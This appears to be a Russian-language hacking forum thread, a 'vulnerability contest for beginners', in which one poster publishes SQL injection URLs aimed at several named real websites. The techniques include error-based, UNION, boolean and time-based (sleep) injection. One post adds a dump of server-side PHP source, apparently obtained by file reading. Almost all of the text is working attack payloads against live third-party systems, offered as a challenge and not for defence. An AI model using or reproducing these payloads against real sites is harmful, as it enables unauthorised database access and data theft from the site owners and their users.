Конкурс уязвимостей для новичков

Обсуждение в разделе «Песочница», начал(-а) yarbabin, 1.06.2015.

  1. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    Хз почему выкладывают ломанные переломанные сайты , очередной челенж
    PHP:
    |
    http://www.canterburyct.org/department.php?id=(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
    ||
    http://www.canterburyct.org/department.php?id=11))+AND+FALSE+union+select+1,2,3,4,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),6,7,8,9,10,11+--+-

    Над запросами не заморачивался,  просто скопировал то что попалосьсмысл другой  был.
    спасибо  Dr.Z3r0
    HTML:
    http://www.jurui-cn.com/military.php?id=9++and+false UNION%0Aselect+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+-
    
     
    #141 BabaDook, 22.12.2017
    В последний раз редактировалось: 22.12.2017
  2. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    PHP:
    https://ukrmarket.net/chn/tag/" and substring(version(),1,1)=5+--+-
    https://ukrmarket.net/chn/tag/" and substring(version(),1,1)=4+--+-
    + чтение файлов.
    HTML:
    img/image.uploader.php'),\n        'CImagesUploader'       => array('core', 'img/images.uploader.php'),\n        'CImagesUploaderField'  => array('core', 'img/images.uploader.field.php'),\n        'CImagesUploaderTable'  => array('core', 'img/images.uploader.table.php'),\n        'bff\\files\\AttachmentsTable' => array('core', 'files/attachments.table.php'),\n        # captcha\n        'CCaptchaProtection'    => array('core', 'captcha/captcha.protection.php'),\n        # core modules\n        'UsersAvatar'           => array('app', 'm"
    "odules/users/users.avatar.php'),\n        'UsersSocial'           => array('app', 'modules/users/users.social.php'),\n        # database\n        'bff\\db\\Dynprops'       => array('core', 'db/dynprops/dynprops.php'),\n        'bff\\db\\Categories'     => array('core', 'db/categories/categories.php'),\n        'bff\\db\\Comments'       => array('core', 'db/comments/comments.php'),\n        'bff\\db\\Tags'           => array('core', 'db/tags/tags.php'),\n        'bff\\db\\NestedSetsTree' => array('core', 'db/nestedsets/nestedsets.php'),\n        'bff\\db\\Publicator'     => array('core', 'db/publicator/publicator.php'),\n        # external\n        'Pimple'                => array('core', 'external/pimple.php'),\n        'Mobile_Detect'         => array('core', 'external/mobile.detect.php'),\n        'CMail'                 => array('core', 'external/mail.php'),\n        'CSmarty'               => array('core', 'external/smarty.php'),\n        'CWysiwyg'              => array('core', 'external/wysiwyg.php'),\n        'qqFileUploader'        => array('core', 'external/qquploader.php'),\n        'Parsedown'             => array('core', 'external/parsedown/parsedown.php'),\n        'Minifier'              => array('core', 'external/minifier.php'),\n        # core\n        'Model'                 => array('core', 'model.php'),\n        'Errors'                => array('core', 'errors.php'),\n        'func'                  => array('core', 'utils/func.php'),\n   "
         'Pagination'            => array('core', 'utils/pagination.php'),\n        'config'                => array('core', 'config.php'),\n        'Cache'                 => array('core', 'cache/cache.php'),\n        'Component'             => array('core', 'component.php'),\n    );\n\n}"
    
     
  3. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    PHP:
    http://zdo.zp.ua/search?name=3&region=1+ and extractvalue(0x0a,/*!12345concat*/(0x0a,user()))+--+-
    HTML:
    https://zvato.ru/article/podrobnee_o_zvatoru') AND sleep(12)+--+-/
     
    #143 BabaDook, 28.12.2017
    В последний раз редактировалось: 28.12.2017
    Это одобряет Gorev.
Загрузка...